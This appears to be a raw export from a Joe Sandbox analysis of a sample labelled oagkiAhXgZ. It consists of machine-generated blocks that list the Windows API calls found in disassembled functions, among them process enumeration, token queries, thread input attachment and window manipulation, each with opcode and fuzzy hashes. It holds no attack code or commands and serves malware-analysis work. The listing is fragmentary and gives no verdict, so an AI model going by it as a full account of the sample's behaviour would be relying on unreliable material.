                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1352109105-0
                                                                                                    • Opcode ID: f3188964a0088247dd81af40cbc37b765dd78529f29c76bda4652c560394253d
                                                                                                    • Instruction ID: 9ac490be080256f301f80a06e31f0efef747527f69b52700d32dfe56ed80073c
                                                                                                    • Opcode Fuzzy Hash: f3188964a0088247dd81af40cbc37b765dd78529f29c76bda4652c560394253d
                                                                                                    • Instruction Fuzzy Hash: 54418DB4645214EFCB22CF98C895EA97BF5FB49314F2580E8E5259B261CB30AD42CF90
                                                                                                    APIs
                                                                                                    • GetForegroundWindow.USER32 ref: 00B316EB
                                                                                                      • Part of subcall function 00B03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B03A57
                                                                                                      • Part of subcall function 00B03A3D: GetCurrentThreadId.KERNEL32 ref: 00B03A5E
                                                                                                      • Part of subcall function 00B03A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B025B3), ref: 00B03A65
                                                                                                    • GetCaretPos.USER32(?), ref: 00B316FF
                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 00B3174C
                                                                                                    • GetForegroundWindow.USER32 ref: 00B31752
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2759813231-0
                                                                                                    • Opcode ID: d724b5c15fec78197a2b96aa6709d22042bb743244e1babaa2ebf259b4c4b27b
                                                                                                    • Instruction ID: 98f974ee727f01e78d9e029da844a5181cabb3049ffce972984ee31b9a80cdba
                                                                                                    • Opcode Fuzzy Hash: d724b5c15fec78197a2b96aa6709d22042bb743244e1babaa2ebf259b4c4b27b
                                                                                                    • Instruction Fuzzy Hash: 583152B1E00249AFD700DFA9C981CAEBBFDEF49304B5484A9E415E7251DB31DE45CBA0
                                                                                                    APIs
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00B0D501
                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00B0D50F
                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00B0D52F
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B0D5DC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                    • String ID:
                                                                                                    • API String ID: 420147892-0
                                                                                                    • Opcode ID: e0f14d182bcd4115f558da728dbeb0faf62c495a9caf501aa6ad051c9c9e726f
                                                                                                    • Instruction ID: 636d744b02d5cb695c617621f13ac8f3dabcfc57b40f3bf62d4227d4338576fa
                                                                                                    • Opcode Fuzzy Hash: e0f14d182bcd4115f558da728dbeb0faf62c495a9caf501aa6ad051c9c9e726f
                                                                                                    • Instruction Fuzzy Hash: A6317E711082009FD300EF94CC85AAFBFE8EF9A354F14092DF585971E1EB719949CB92
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2
                                                                                                    • GetCursorPos.USER32(?), ref: 00B39001
                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00AF7711,?,?,?,?,?), ref: 00B39016
                                                                                                    • GetCursorPos.USER32(?), ref: 00B3905E
                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00AF7711,?,?,?), ref: 00B39094
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2864067406-0
                                                                                                    • Opcode ID: 8eea1ce6ff6c8293f671c39970e79a19918cdc9942e5e5b287763dc7701babef
                                                                                                    • Instruction ID: 30f3fd55d453ba21602eee8b0fab125aceca51ecb8bc47fbca83a23463f9be8b
                                                                                                    • Opcode Fuzzy Hash: 8eea1ce6ff6c8293f671c39970e79a19918cdc9942e5e5b287763dc7701babef
                                                                                                    • Instruction Fuzzy Hash: 6D21D135600118EFCB298F98CC59EFE3BF9EF49350F204095F90557261C771A991DB60
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNEL32(?,00B3CB68), ref: 00B0D2FB
                                                                                                    • GetLastError.KERNEL32 ref: 00B0D30A
                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B0D319
                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00B3CB68), ref: 00B0D376
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 2267087916-0
                                                                                                    • Opcode ID: e986e7c15e15857c8474f85394886d7d57c219ecb9eebfe40d60870325eaf6ea
                                                                                                    • Instruction ID: b2639fcfec32c40d0e3f1db4ecce7958aa4733caf5777c4bc49d90864acd1c04
                                                                                                    • Opcode Fuzzy Hash: e986e7c15e15857c8474f85394886d7d57c219ecb9eebfe40d60870325eaf6ea
                                                                                                    • Instruction Fuzzy Hash: 02217C705083019FC700DFA8C98186FBBE4EE5A364F204A5DF499D72E1EB309946CB97
                                                                                                    APIs
                                                                                                      • Part of subcall function 00B01014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B0102A
                                                                                                      • Part of subcall function 00B01014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B01036
                                                                                                      • Part of subcall function 00B01014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B01045
                                                                                                      • Part of subcall function 00B01014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B0104C
                                                                                                      • Part of subcall function 00B01014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B01062
                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00B015BE
                                                                                                    • _memcmp.LIBVCRUNTIME ref: 00B015E1
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B01617
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B0161E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 1592001646-0
                                                                                                    • Opcode ID: 2c6ef1454f484f511427d1e39e4c10ba549b679479a9016f44f14e5047971896
                                                                                                    • Instruction ID: b75a6ad55ec4e235686297672c59d4982c25b8f974f288ebe6e896741e4b989b
                                                                                                    • Opcode Fuzzy Hash: 2c6ef1454f484f511427d1e39e4c10ba549b679479a9016f44f14e5047971896
                                                                                                    • Instruction Fuzzy Hash: 2F217C31E00108AFDB18DFA8CD45BEEBBF8EF44344F184899E441AB291E731AA45DB50
                                                                                                    APIs
                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00B3280A
                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B32824
                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B32832
                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00B32840
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                                    • String ID:
                                                                                                    • API String ID: 2169480361-0
                                                                                                    • Opcode ID: c07a73ea5be4b61c6c7bcff31879a12fca9665dbb89b3ff4e95b38ef8ae4c1b7
                                                                                                    • Instruction ID: f5734f314edb935942cac831cb84c4a5456a5fc26c72f893df81400cf4a5cf36
                                                                                                    • Opcode Fuzzy Hash: c07a73ea5be4b61c6c7bcff31879a12fca9665dbb89b3ff4e95b38ef8ae4c1b7
                                                                                                    • Instruction Fuzzy Hash: F721B331605511AFD7149B24C855FAA7B95FF46324F258198F4268B6E2CB71FC42C790
                                                                                                    APIs
                                                                                                      • Part of subcall function 00B08D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00B0790A,?,000000FF,?,00B08754,00000000,?,0000001C,?,?), ref: 00B08D8C
                                                                                                      • Part of subcall function 00B08D7D: lstrcpyW.KERNEL32(00000000,?,?,00B0790A,?,000000FF,?,00B08754,00000000,?,0000001C,?,?,00000000), ref: 00B08DB2
                                                                                                      • Part of subcall function 00B08D7D: lstrcmpiW.KERNEL32(00000000,?,00B0790A,?,000000FF,?,00B08754,00000000,?,0000001C,?,?), ref: 00B08DE3
                                                                                                    • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00B08754,00000000,?,0000001C,?,?,00000000), ref: 00B07923
                                                                                                    • lstrcpyW.KERNEL32(00000000,?,?,00B08754,00000000,?,0000001C,?,?,00000000), ref: 00B07949
                                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00B08754,00000000,?,0000001C,?,?,00000000), ref: 00B07984
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                                    • String ID: cdecl
                                                                                                    • API String ID: 4031866154-3896280584
                                                                                                    • Opcode ID: 06f166b41080b9145c5596e4d6558c9dc5a6c43d7e4a6442a1f75465db4a1852
                                                                                                    • Instruction ID: 2b1fc3aa76bde77fc61221e6dec68ddcbd09801fb59e722b1029c1edd099df6a
                                                                                                    • Opcode Fuzzy Hash: 06f166b41080b9145c5596e4d6558c9dc5a6c43d7e4a6442a1f75465db4a1852
                                                                                                    • Instruction Fuzzy Hash: 6411E13A200202BFCB159F38C845D7ABBE9EF85350B50806AE842C72A4EF31A911D7A1
                                                                                                    APIs
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00B37D0B
                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00B37D2A
                                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B37D42
                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00B1B7AD,00000000), ref: 00B37D6B
                                                                                                      • Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long
                                                                                                    • String ID:
                                                                                                    • API String ID: 847901565-0
                                                                                                    • Opcode ID: b8e3cab28caeb0faee5fe75c0a0d24a67385155c9471fff964343dfdbaf09c12
                                                                                                    • Instruction ID: 71ea17539380beed1e9db98947c08abc920fc1c8f88f389844b20843318752c0
                                                                                                    • Opcode Fuzzy Hash: b8e3cab28caeb0faee5fe75c0a0d24a67385155c9471fff964343dfdbaf09c12
                                                                                                    • Instruction Fuzzy Hash: D911ACB6244654AFCB208F6CCC04AAA3BE4EF45360F218764F939D72E0DF308961DB50
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00001060,?,00000004), ref: 00B356BB
                                                                                                    • _wcslen.LIBCMT ref: 00B356CD
                                                                                                    • _wcslen.LIBCMT ref: 00B356D8
                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B35816
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 455545452-0
                                                                                                    • Opcode ID: 0c89f1b1888edc3b09b022baf76743bfbe48f49a58e9fbaebed9a68ac2945b94
                                                                                                    • Instruction ID: 240ab5193433ef508216d9cbc2ec9e1ac5a6180f434375ee881cd6d5d26bec26
                                                                                                    • Opcode Fuzzy Hash: 0c89f1b1888edc3b09b022baf76743bfbe48f49a58e9fbaebed9a68ac2945b94
                                                                                                    • Instruction Fuzzy Hash: 7911D37560061896DB30DFA5CCC6AEE77ECEF15760F7041AAF915D6181EB70DA80CB60
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 71bb45d9dafa77843977f8abbf2f95a0c1fdf683f8eee9fe25fc3a18d72c0c09
                                                                                                    • Instruction ID: 24732365b8b49cfa5ec34d4a23cfa5bab1c46384f676abc061a2e74cab6b9a05
                                                                                                    • Opcode Fuzzy Hash: 71bb45d9dafa77843977f8abbf2f95a0c1fdf683f8eee9fe25fc3a18d72c0c09
                                                                                                    • Instruction Fuzzy Hash: 590162B2209A167EF62126B87CC1F67766EDF917B8B340327F567613D2DB608C409270
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00B01A47
                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B01A59
                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B01A6F
                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B01A8A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: 62b555150a20a1b2a108d1c6cbb23530c12a8daaaecbc859c6387f03dde2066d
                                                                                                    • Instruction ID: dbe494d6e84d7763a378e6a46b7c88bf4a24b0cf4b8b5f25d9645ddea6e08d24
                                                                                                    • Opcode Fuzzy Hash: 62b555150a20a1b2a108d1c6cbb23530c12a8daaaecbc859c6387f03dde2066d
                                                                                                    • Instruction Fuzzy Hash: AE11FA3AA01219FFEB119BA9CD85FADBBB8EB04750F200491E614B7290DA716E50DB94
                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00B0E1FD
                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00B0E230
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B0E246
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B0E24D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 2880819207-0
                                                                                                    • Opcode ID: addd8afd9413a2f4184b800a90f7a7aa88de5d3b191bab4181222c552192b7b9
                                                                                                    • Instruction ID: ef8002e9e89b4e4bffa6083bf083ed99e55d42b5020861f7123385c490180780
                                                                                                    • Opcode Fuzzy Hash: addd8afd9413a2f4184b800a90f7a7aa88de5d3b191bab4181222c552192b7b9
                                                                                                    • Instruction Fuzzy Hash: 7211A176904254BBC7019FECAC09A9E7FACEB45324F154A69F928E3291DAB0D94487A0
                                                                                                    APIs
                                                                                                    • CreateThread.KERNEL32(00000000,?,00ACCFF9,00000000,00000004,00000000), ref: 00ACD218
                                                                                                    • GetLastError.KERNEL32 ref: 00ACD224
                                                                                                    • __dosmaperr.LIBCMT ref: 00ACD22B
                                                                                                    • ResumeThread.KERNEL32(00000000), ref: 00ACD249
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                    • String ID:
                                                                                                    • API String ID: 173952441-0
                                                                                                    • Opcode ID: 32145fd1844c4d15374d663edfd8ed4cea16e12c2e2593aa224a789f2af9f1c6
                                                                                                    • Instruction ID: a90bb23a25e9d30f8c8d512700d8a8a72ad39b91ca4ee613d9247db59698bd83
                                                                                                    • Opcode Fuzzy Hash: 32145fd1844c4d15374d663edfd8ed4cea16e12c2e2593aa224a789f2af9f1c6
                                                                                                    • Instruction Fuzzy Hash: 05018076805204BBDB215BA9DC09FEE7E69EF81731F22422DF925A61D0DF71C901D7A0
                                                                                                    APIs
                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AA604C
                                                                                                    • GetStockObject.GDI32(00000011), ref: 00AA6060
                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA606A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3970641297-0
                                                                                                    • Opcode ID: c9b3b64f72f91e7236ca4a61495b0625baebcabf73070514a9a1e1add392e48b
                                                                                                    • Instruction ID: d749ad79949d33370d2aca1c5d72065f68ea9581c3cf43ccd612dfff49536ac9
                                                                                                    • Opcode Fuzzy Hash: c9b3b64f72f91e7236ca4a61495b0625baebcabf73070514a9a1e1add392e48b
                                                                                                    • Instruction Fuzzy Hash: 7B116D72501949BFEF124FA49C44EEABF6DEF093A5F194215FA1463150DB329CA0EFA0
                                                                                                    APIs
                                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 00AC3B56
                                                                                                      • Part of subcall function 00AC3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00AC3AD2
                                                                                                      • Part of subcall function 00AC3AA3: ___AdjustPointer.LIBCMT ref: 00AC3AED
                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00AC3B6B
                                                                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00AC3B7C
                                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 00AC3BA4
                                                                                                    Memory Dump Source
